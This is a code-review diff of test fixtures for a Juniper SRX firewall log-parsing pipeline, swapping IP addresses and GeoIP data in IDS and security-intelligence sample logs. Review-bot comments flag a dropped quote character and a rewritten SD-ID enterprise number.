+<11>1 2020-07-17T10:01:43.006+02:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@67.43.156.15 attack-name="FIN but no ACK bit!" source-address="10.1.1.100" source-port="42799" destination-address="10.1.1.1" destination-port="7" source-zone-name="trust" interface-name="ge-0/0/1.0" action="drop"]
diff --git a/packages/juniper/data_stream/srx/_dev/test/pipeline/test-ids.log-expected.json b/packages/juniper/data_stream/srx/_dev/test/pipeline/test-ids.log-expected.json
index 28498dd3c39..c97c7b662c6 100644
--- a/packages/juniper/data_stream/srx/_dev/test/pipeline/test-ids.log-expected.json
+++ b/packages/juniper/data_stream/srx/_dev/test/pipeline/test-ids.log-expected.json
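Review bot: Two rewritten lines dropped the opening quote of a parameter value: the RT_SCREEN_TCP `SYN flood!` line and the RT_SCREEN_TCP_DST_IP line both contain `destination-address=67.43.156.15"` where the old lines had `destination-address="81.2.69.143"`. The regenerated expected file carries the malformed text verbatim in `event.original` (hunk `@@ -252,17` of test-ids.log-expected.json) and still shows `destination.ip`/`server.ip` resolved, so the parser appears to tolerate it, but the fixture now asserts behaviour on input that is not well-formed RFC 5424 structured data rather than on what a device emits. Change both occurrences to `destination-address="67.43.156.15"` and regenerate test-ids.log-expected.json.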
@@ -3,42 +3,42 @@
 {
 "server": {
 "port": 1433,
- "ip": "81.2.69.193"
+ "ip": "67.43.156.14"
 },
 "log": {
 "level": "error"
 },
 "destination": {
 "geo": {
- "continent_name": "Europe",
- "region_iso_code": "GB-ENG",
- "city_name": "London",
- "country_iso_code": "GB",
- "country_name": "United Kingdom",
- "region_name": "England",
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
 "location": {
- "lon": -0.0931,
- "lat": 51.5142
- }
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
 },
 "port": 1433,
- "ip": "81.2.69.193"
+ "ip": "67.43.156.14"
 },
 "source": {
 "geo": {
- "continent_name": "Europe",
- "region_iso_code": "GB-ENG",
- "city_name": "London",
- "country_iso_code": "GB",
- "country_name": "United Kingdom",
- "region_name": "England",
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
 "location": {
- "lon": -0.0931,
- "lat": 51.5142
- }
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
 },
 "port": 6000,
- "ip": "81.2.69.145"
+ "ip": "67.43.156.13"
 },
 "juniper": {
 "srx": {
@@ -69,18 +69,18 @@
 },
 "related": {
 "ip": [
- "81.2.69.145",
- "81.2.69.193"
+ "67.43.156.13",
+ "67.43.156.14"
 ]
 },
 "client": {
 "port": 6000,
- "ip": "81.2.69.145"
+ "ip": "67.43.156.13"
 },
 "event": {
 "severity": 11,
- "ingested": "2021-12-06T12:25:31.660111986Z",
- "original": "\u003c11\u003e1 2018-07-19T18:17:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@2636.81.2.69.143.137 attack-name=\"TCP sweep!\" source-address=\"81.2.69.145\" source-port=\"6000\" destination-address=\"81.2.69.193\" destination-port=\"1433\" source-zone-name=\"untrust\" interface-name=\"fe-0/0/2.0\" action=\"drop\"]",
+ "ingested": "2021-12-10T10:14:09.302494600Z",
+ "original": "\u003c11\u003e1 2018-07-19T18:17:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@67.43.156.15 attack-name=\"TCP sweep!\" source-address=\"67.43.156.13\" source-port=\"6000\" destination-address=\"67.43.156.14\" destination-port=\"1433\" source-zone-name=\"untrust\" interface-name=\"fe-0/0/2.0\" action=\"drop\"]",
 "kind": "alert",
 "action": "sweep_detected",
 "category": [
@@ -167,8 +167,8 @@
 },
 "event": {
 "severity": 11,
- "ingested": "2021-12-06T12:25:31.660119229Z",
- "original": "\u003c11\u003e1 2018-07-19T18:18:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@2636.81.2.69.143.36 attack-name=\"WinNuke attack!\" source-address=\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\" source-port=\"3240\" destination-address=\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\" destination-port=\"139\" source-zone-name=\"untrust\" interface-name=\"fe-0/0/2.0\" action=\"drop\"]",
+ "ingested": "2021-12-10T10:14:09.302518100Z",
+ "original": "\u003c11\u003e1 2018-07-19T18:18:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@67.43.156.15 attack-name=\"WinNuke attack!\" source-address=\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\" source-port=\"3240\" destination-address=\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\" destination-port=\"139\" source-zone-name=\"untrust\" interface-name=\"fe-0/0/2.0\" action=\"drop\"]",
 "kind": "alert",
 "action": "attack_detected",
 "category": [
@@ -186,42 +186,42 @@
 {
 "server": {
 "port": 50010,
- "ip": "81.2.69.143"
+ "ip": "67.43.156.15"
 },
 "log": {
 "level": "error"
 },
 "destination": {
 "geo": {
- "continent_name": "Europe",
- "region_iso_code": "GB-ENG",
- "city_name": "London",
- "country_iso_code": "GB",
- "country_name": "United Kingdom",
- "region_name": "England",
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
 "location": {
- "lon": -0.0931,
- "lat": 51.5142
- }
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
 },
 "port": 50010,
- "ip": "81.2.69.143"
+ "ip": "67.43.156.15"
 },
 "source": {
 "geo": {
- "continent_name": "Europe",
- "region_iso_code": "GB-ENG",
- "city_name": "London",
- "country_iso_code": "GB",
- "country_name": "United Kingdom",
- "region_name": "England",
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
 "location": {
- "lon": -0.0931,
- "lat": 51.5142
- }
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
 },
 "port": 40001,
- "ip": "81.2.69.143"
+ "ip": "67.43.156.15"
 },
 "juniper": {
 "srx": {
@@ -252,17 +252,17 @@
 },
 "related": {
 "ip": [
- "81.2.69.143"
+ "67.43.156.15"
 ]
 },
 "client": {
 "port": 40001,
- "ip": "81.2.69.143"
+ "ip": "67.43.156.15"
 },
 "event": {
 "severity": 11,
- "ingested": "2021-12-06T12:25:31.660121043Z",
- "original": "\u003c11\u003e1 2018-07-19T18:19:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@2636.81.2.69.143.40 attack-name=\"SYN flood!\" source-address=\"81.2.69.143\" source-port=\"40001\" destination-address=\"81.2.69.143\" destination-port=\"50010\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]",
+ "ingested": "2021-12-10T10:14:09.302526500Z",
+ "original": "\u003c11\u003e1 2018-07-19T18:19:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@67.43.156.15 attack-name=\"SYN flood!\" source-address=\"67.43.156.15\" source-port=\"40001\" destination-address=67.43.156.15\" destination-port=\"50010\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]",
 "kind": "alert",
 "action": "flood_detected",
 "category": [
@@ -280,42 +280,42 @@
 {
 "server": {
 "port": 53,
- "ip": "81.2.69.143"
+ "ip": "67.43.156.15"
 },
 "log": {
 "level": "error"
 },
 "destination": {
 "geo": {
- "continent_name": "Europe",
- "region_iso_code": "GB-ENG",
- "city_name": "London",
- "country_iso_code": "GB",
- "country_name": "United Kingdom",
- "region_name": "England",
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
 "location": {
- "lon": -0.0931,
- "lat": 51.5142
- }
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
 },
 "port": 53,
- "ip": "81.2.69.143"
+ "ip": "67.43.156.15"
 },
 "source": {
 "geo": {
- "continent_name": "Europe",
- "region_iso_code": "GB-ENG",
- "city_name": "London",
- "country_iso_code": "GB",
- "country_name": "United Kingdom",
- "region_name": "England",
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
 "location": {
- "lon": -0.0931,
- "lat": 51.5142
- }
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
 },
 "port": 40001,
- "ip": "81.2.69.193"
+ "ip": "67.43.156.15"
 },
 "juniper": {
 "srx": {
@@ -346,18 +346,17 @@
 },
 "related": {
 "ip": [
- "81.2.69.193",
- "81.2.69.143"
+ "67.43.156.15"
 ]
 },
 "client": {
 "port": 40001,
- "ip": "81.2.69.193"
+ "ip": "67.43.156.15"
 },
 "event": {
 "severity": 11,
- "ingested": "2021-12-06T12:25:31.660122666Z",
- "original": "\u003c11\u003e1 2018-07-19T18:22:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_UDP [junos@2636.81.2.69.143.40 attack-name=\"UDP flood!\" source-address=\"81.2.69.193\" source-port=\"40001\" destination-address=\"81.2.69.143\" destination-port=\"53\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]",
+ "ingested": "2021-12-10T10:14:09.302615700Z",
+ "original": "\u003c11\u003e1 2018-07-19T18:22:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_UDP [junos@67.43.156.15 attack-name=\"UDP flood!\" source-address=\"67.43.156.15\" source-port=\"40001\" destination-address=\"67.43.156.15\" destination-port=\"53\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]",
 "kind": "alert",
 "action": "flood_detected",
 "category": [
@@ -374,40 +373,40 @@
 },
 {
 "server": {
- "ip": "81.2.69.143"
+ "ip": "67.43.156.15"
 },
 "log": {
 "level": "error"
 },
 "destination": {
 "geo": {
- "continent_name": "Europe",
- "region_iso_code": "GB-ENG",
- "city_name": "London",
- "country_iso_code": "GB",
- "country_name": "United Kingdom",
- "region_name": "England",
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
 "location": {
- "lon": -0.0931,
- "lat": 51.5142
- }
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
 },
- "ip": "81.2.69.143"
+ "ip": "67.43.156.15"
 },
 "source": {
 "geo": {
- "continent_name": "Europe",
- "region_iso_code": "GB-ENG",
- "city_name": "London",
- "country_iso_code": "GB",
- "country_name": "United Kingdom",
- "region_name": "England",
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
 "location": {
- "lon": -0.0931,
- "lat": 51.5142
- }
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
 },
- "ip": "81.2.69.193"
+ "as": {
+ "number": 35908
+ },
+ "ip": "67.43.156.15"
 },
 "juniper": {
 "srx": {
@@ -438,17 +437,16 @@
 },
 "related": {
 "ip": [
- "81.2.69.193",
- "81.2.69.143"
+ "67.43.156.15"
 ]
 },
 "client": {
- "ip": "81.2.69.193"
+ "ip": "67.43.156.15"
 },
 "event": {
 "severity": 11,
- "ingested": "2021-12-06T12:25:31.660124269Z",
- "original": "\u003c11\u003e1 2018-07-19T18:25:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_ICMP [junos@2636.81.2.69.143.40 attack-name=\"ICMP fragment!\" source-address=\"81.2.69.193\" destination-address=\"81.2.69.143\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]",
+ "ingested": "2021-12-10T10:14:09.302620100Z",
+ "original": "\u003c11\u003e1 2018-07-19T18:25:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_ICMP [junos@67.43.156.15 attack-name=\"ICMP fragment!\" source-address=\"67.43.156.15\" destination-address=\"67.43.156.15\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]",
 "kind": "alert",
 "action": "fragment_detected",
 "category": [
@@ -465,40 +463,40 @@
 },
 {
 "server": {
- "ip": "81.2.69.143"
+ "ip": "67.43.156.15"
 },
 "log": {
 "level": "error"
 },
 "destination": {
 "geo": {
- "continent_name": "Europe",
- "region_iso_code": "GB-ENG",
- "city_name": "London",
- "country_iso_code": "GB",
- "country_name": "United Kingdom",
- "region_name": "England",
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
 "location": {
- "lon": -0.0931,
- "lat": 51.5142
- }
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
 },
- "ip": "81.2.69.143"
+ "ip": "67.43.156.15"
 },
 "source": {
 "geo": {
- "continent_name": "Europe",
- "region_iso_code": "GB-ENG",
- "city_name": "London",
- "country_iso_code": "GB",
- "country_name": "United Kingdom",
- "region_name": "England",
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
 "location": {
- "lon": -0.0931,
- "lat": 51.5142
- }
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
 },
- "ip": "81.2.69.193"
+ "ip": "67.43.156.15"
 },
 "juniper": {
 "srx": {
@@ -532,17 +530,16 @@
 },
 "related": {
 "ip": [
- "81.2.69.193",
- "81.2.69.143"
+ "67.43.156.15"
 ]
 },
 "client": {
- "ip": "81.2.69.193"
+ "ip": "67.43.156.15"
 },
 "event": {
 "severity": 11,
- "ingested": "2021-12-06T12:25:31.660125721Z",
- "original": "\u003c11\u003e1 2018-07-19T18:26:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_IP [junos@2636.81.2.69.143.40 attack-name=\"Record Route IP option!\" source-address=\"81.2.69.193\" destination-address=\"81.2.69.143\" protocol-id=\"1\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]",
+ "ingested": "2021-12-10T10:14:09.302625500Z",
+ "original": "\u003c11\u003e1 2018-07-19T18:26:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_IP [junos@67.43.156.15 attack-name=\"Record Route IP option!\" source-address=\"67.43.156.15\" destination-address=\"67.43.156.15\" protocol-id=\"1\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]",
 "kind": "alert",
 "category": [
 "network",
@@ -627,8 +624,8 @@
 },
 "event": {
 "severity": 11,
- "ingested": "2021-12-06T12:25:31.660127254Z",
- "original": "\u003c11\u003e1 2018-07-19T18:27:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_IP [junos@2636.81.2.69.143.40 attack-name=\"Tunnel GRE 6in6!\" source-address=\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\" destination-address=\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\" protocol-id=\"1\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]",
+ "ingested": "2021-12-10T10:14:09.302630400Z",
+ "original": "\u003c11\u003e1 2018-07-19T18:27:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_IP [junos@67.43.156.15 attack-name=\"Tunnel GRE 6in6!\" source-address=\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\" destination-address=\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\" protocol-id=\"1\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]",
 "kind": "alert",
 "action": "tunneling_screen",
 "category": [
@@ -645,40 +642,40 @@ }, { "server": { - "ip": "81.2.69.193" + "ip": "67.43.156.15" }, "log": { "level": "error" }, "destination": { "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "England", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -0.0931, - "lat": 51.5142 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, - "ip": "81.2.69.193" + "as": { + "number": 35908 + }, + "ip": "67.43.156.15" }, "source": { "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "England", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -0.0931, - "lat": 51.5142 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, - "ip": "81.2.69.193" + "as": { + "number": 35908 + }, + "ip": "67.43.156.13" }, "juniper": { "srx": { 
@@ -712,16 +709,17 @@ }, "related": { "ip": [ - "81.2.69.193" + "67.43.156.13", + "67.43.156.15" ] }, "client": { - "ip": "81.2.69.193" + "ip": "67.43.156.13" }, "event": { "severity": 11, - "ingested": "2021-12-06T12:25:31.660128717Z", - "original": "\u003c11\u003e1 2018-07-19T18:28:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_IP [junos@2636.81.2.69.143.40 attack-name=\"Tunnel GRE 4in4!\" source-address=\"81.2.69.193\" destination-address=\"81.2.69.193\" protocol-id=\"1\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]", + "ingested": "2021-12-10T10:14:09.302638100Z", + "original": "\u003c11\u003e1 2018-07-19T18:28:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_IP [junos@67.43.156.15 attack-name=\"Tunnel GRE 4in4!\" source-address=\"67.43.156.13\" destination-address=\"67.43.156.15\" protocol-id=\"1\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]", "kind": "alert", "action": "tunneling_screen", "category": [ @@ -738,7 +736,7 @@ }, { "server": { - "ip": "81.2.69.143" + "ip": "67.43.156.15" }, "observer": { "name": "rtr199", @@ -758,7 +756,7 @@ }, "related": { "ip": [ - "81.2.69.143" + "67.43.156.15" ] }, "log": { @@ -766,18 +764,18 @@ }, "destination": { "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "England", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -0.0931, - "lat": 51.5142 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, - "ip": "81.2.69.143" + "ip": "67.43.156.15" }, "juniper": { "srx": { 
@@ -789,8 +787,8 @@ }, "event": { "severity": 11, - "ingested": "2021-12-06T12:25:31.660130130Z", - "original": "\u003c11\u003e1 2018-07-19T19:19:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP_DST_IP [junos@2636.81.2.69.143.40 attack-name=\"SYN flood!\" destination-address=\"81.2.69.143\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"alarm-without-drop\"]", + "ingested": "2021-12-10T10:14:09.302642100Z", + "original": "\u003c11\u003e1 2018-07-19T19:19:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP_DST_IP [junos@67.43.156.15 attack-name=\"SYN flood!\" destination-address=67.43.156.15\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"alarm-without-drop\"]", "kind": "alert", "action": "flood_detected", "category": [ @@ -827,29 +825,29 @@ }, "related": { "ip": [ - "81.2.69.193" + "67.43.156.15" ] }, "log": { "level": "error" }, "client": { - "ip": "81.2.69.193" + "ip": "67.43.156.15" }, "source": { "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "England", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -0.0931, - "lat": 51.5142 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, - "ip": "81.2.69.193" + "ip": "67.43.156.15" }, "juniper": { "srx": { 
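Review bot: The new `original` value for the RT_SCREEN_TCP_DST_IP event is malformed: it reads `destination-address=67.43.156.15\"` where the removed line had `destination-address=\"81.2.69.143\"`, so the opening quote of the SD-PARAM value was lost during the IP substitution. Since the `ingested` timestamps changed in every hunk, this file was presumably regenerated from its input log, which means the input line carries the same typo and the test now pins parser behaviour on an invalid structured-data element rather than on what a Junos device actually emits; the `destination.ip`/`related.ip` values asserted here may only be the product of a lenient pattern. Restore the quote in the input line (`destination-address=\"67.43.156.15\"`) and regenerate the expected output.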
@@ -861,8 +859,8 @@ }, "event": { "severity": 11, - "ingested": "2021-12-06T12:25:31.660131632Z", - "original": "\u003c11\u003e1 2018-07-19T19:19:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP_SRC_IP [junos@2636.81.2.69.143.40 attack-name=\"SYN flood!\" source-address=\"81.2.69.193\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"alarm-without-drop\"]", + "ingested": "2021-12-10T10:14:09.302646100Z", + "original": "\u003c11\u003e1 2018-07-19T19:19:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP_SRC_IP [junos@67.43.156.15 attack-name=\"SYN flood!\" source-address=\"67.43.156.15\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"alarm-without-drop\"]", "kind": "alert", "action": "flood_detected", "category": [ @@ -883,45 +881,18 @@ { "server": { "port": 10778, - "ip": "81.2.69.193" + "ip": "10.1.1.1" }, "log": { "level": "error" }, "destination": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "England", - "location": { - "lon": -0.0931, - "lat": 51.5142 - } - }, "port": 10778, - "ip": "81.2.69.193" + "ip": "10.1.1.1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", - "location": { - "lon": -122.3149, - "lat": 47.2513 - } - }, - "as": { - "number": 209 - }, "port": 50630, - "ip": "216.160.83.61" + "ip": "10.1.1.100" }, "juniper": { "srx": { 
@@ -952,18 +923,18 @@ }, "related": { "ip": [ - "216.160.83.61", - "81.2.69.193" + "10.1.1.100", + "10.1.1.1" ] }, "client": { "port": 50630, - "ip": "216.160.83.61" + "ip": "10.1.1.100" }, "event": { "severity": 11, - "ingested": "2021-12-06T12:25:31.660133045Z", - "original": "\u003c11\u003e1 2020-07-17T09:54:43.912+02:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@2636.81.2.69.143.129 attack-name=\"TCP port scan!\" source-address=\"216.160.83.61\" source-port=\"50630\" destination-address=\"81.2.69.193\" destination-port=\"10778\" source-zone-name=\"trust\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]", + "ingested": "2021-12-10T10:14:09.302650400Z", + "original": "\u003c11\u003e1 2020-07-17T09:54:43.912+02:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@67.43.156.15 attack-name=\"TCP port scan!\" source-address=\"10.1.1.100\" source-port=\"50630\" destination-address=\"10.1.1.1\" destination-port=\"10778\" source-zone-name=\"trust\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]", "kind": "alert", "action": "scan_detected", "category": [ @@ -981,45 +952,18 @@ { "server": { "port": 7, - "ip": "81.2.69.193" + "ip": "10.1.1.1" }, "log": { "level": "error" }, "destination": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "England", - "location": { - "lon": -0.0931, - "lat": 51.5142 - } - }, "port": 7, - "ip": "81.2.69.193" + "ip": "10.1.1.1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", - "location": { - "lon": -122.3149, - "lat": 47.2513 - } - }, - "as": { - "number": 209 - }, "port": 42799, - "ip": "216.160.83.61" + "ip": "10.1.1.100" }, "juniper": { "srx": { 
@@ -1050,18 +994,18 @@ }, "related": { "ip": [ - "216.160.83.61", - "81.2.69.193" + "10.1.1.100", + "10.1.1.1" ] }, "client": { "port": 42799, - "ip": "216.160.83.61" + "ip": "10.1.1.100" }, "event": { "severity": 11, - "ingested": "2021-12-06T12:25:31.660134568Z", - "original": "\u003c11\u003e1 2020-07-17T10:01:43.006+02:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@2636.81.2.69.143.129 attack-name=\"FIN but no ACK bit!\" source-address=\"216.160.83.61\" source-port=\"42799\" destination-address=\"81.2.69.193\" destination-port=\"7\" source-zone-name=\"trust\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]", + "ingested": "2021-12-10T10:14:09.302656Z", + "original": "\u003c11\u003e1 2020-07-17T10:01:43.006+02:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@67.43.156.15 attack-name=\"FIN but no ACK bit!\" source-address=\"10.1.1.100\" source-port=\"42799\" destination-address=\"10.1.1.1\" destination-port=\"7\" source-zone-name=\"trust\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]", "kind": "alert", "action": "illegal_tcp_flag_detected", "category": [ diff --git a/packages/juniper/data_stream/srx/_dev/test/pipeline/test-secintel.log b/packages/juniper/data_stream/srx/_dev/test/pipeline/test-secintel.log index f76163943a1..b8837283446 100644 --- a/packages/juniper/data_stream/srx/_dev/test/pipeline/test-secintel.log +++ b/packages/juniper/data_stream/srx/_dev/test/pipeline/test-secintel.log 
@@ -1,2 +1,2 @@
-<14>1 2016-10-17T15:18:11.618Z SRX-1500 RT_SECINTEL - SECINTEL_ACTION_LOG [junos@2636.1.1.1.2.129 category="secintel" sub-category="Blacklist" action="BLOCK" action-detail="DROP" http-host="N/A" threat-severity="0" source-address="216.160.83.61" source-port="1" destination-address="216.160.83.61" destination-port="24039" protocol-id="1" application="N/A" nested-application="N/A" feed-name="Tor_Exit_Nodes" policy-name="cc_policy" profile-name="Blacklist" username="N/A" roles="N/A" session-id-32="572564" source-zone-name="Outside" destination-zone-name="DMZ"]
-<14>1 2016-10-17T15:18:11.618Z SRX-1500 RT_SECINTEL - SECINTEL_ACTION_LOG [junos@2636.1.1.1.2.129 category="secintel" sub-category="CC" action="BLOCK" action-detail="CLOSE REDIRECT MSG" http-host="dummy_host" threat-severity="10" source-address="216.160.83.61" source-port="36612" destination-address="216.160.83.61" destination-port="80" protocol-id="6" application="HTTP" nested-application="N/A" feed-name="cc_url_data" policy-name="test" profile-name="test-profile" username="N/A" roles="N/A" session-id-32="502362" source-zone-name="Inside" destination-zone-name="Outside" occur-count="0"]
+<14>1 2016-10-17T15:18:11.618Z SRX-1500 RT_SECINTEL - SECINTEL_ACTION_LOG [junos@67.43.156.15 category="secintel" sub-category="Blacklist" action="BLOCK" action-detail="DROP" http-host="N/A" threat-severity="0" source-address="67.43.156.15" source-port="1" destination-address="10.10.0.10" destination-port="24039" protocol-id="1" application="N/A" nested-application="N/A" feed-name="Tor_Exit_Nodes" policy-name="cc_policy" profile-name="Blacklist" username="N/A" roles="N/A" session-id-32="572564" source-zone-name="Outside" destination-zone-name="DMZ"]
+<14>1 2016-10-17T15:18:11.618Z SRX-1500 RT_SECINTEL - SECINTEL_ACTION_LOG [junos@67.43.156.15 category="secintel" sub-category="CC" action="BLOCK" action-detail="CLOSE REDIRECT MSG" http-host="dummy_host" threat-severity="10" source-address="67.43.156.15" 
source-port="36612" destination-address="10.0.0.1" destination-port="80" protocol-id="6" application="HTTP" nested-application="N/A" feed-name="cc_url_data" policy-name="test" profile-name="test-profile" username="N/A" roles="N/A" session-id-32="502362" source-zone-name="Inside" destination-zone-name="Outside" occur-count="0"] diff --git a/packages/juniper/data_stream/srx/_dev/test/pipeline/test-secintel.log-expected.json b/packages/juniper/data_stream/srx/_dev/test/pipeline/test-secintel.log-expected.json index f3bcdc53272..d3b6775b120 100644 --- a/packages/juniper/data_stream/srx/_dev/test/pipeline/test-secintel.log-expected.json +++ b/packages/juniper/data_stream/srx/_dev/test/pipeline/test-secintel.log-expected.json @@ -3,48 +3,30 @@ { "server": { "port": 24039, - "ip": "216.160.83.61" + "ip": "10.10.0.10" }, "log": { "level": "informational" }, "destination": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", - "location": { - "lon": -122.3149, - "lat": 47.2513 - } - }, - "as": { - "number": 209 - }, "port": 24039, - "ip": "216.160.83.61" + "ip": "10.10.0.10" }, "source": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -122.3149, - "lat": 47.2513 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 209 + "number": 35908 }, "port": 1, - "ip": "216.160.83.61" + "ip": "67.43.156.15" }, "juniper": { "srx": { 
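Review bot: The substitution also rewrote the RFC 5424 SD-ID on both lines, turning `junos@2636.1.1.1.2.129` into `junos@67.43.156.15`; the part after `@` is Juniper's IANA private enterprise number (2636) followed by an OID-style suffix, not an IP address, so the fixture no longer resembles what an SRX emits. The same rewrite appears on every line of the test-utm.log hunk below, and the screen expected-output hunks above show an earlier pass had already partially mangled it (`junos@2636.81.2.69.143.40`). Whether the pipeline keys on the enterprise number I cannot tell from here, but if it ever does, these fixtures will not exercise that path; restore `junos@2636.1.1.1.2.129` here (and the `.86`/`.40`/`.129` variants in test-utm.log) and limit the replacement to the `source-address`/`destination-address` values.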
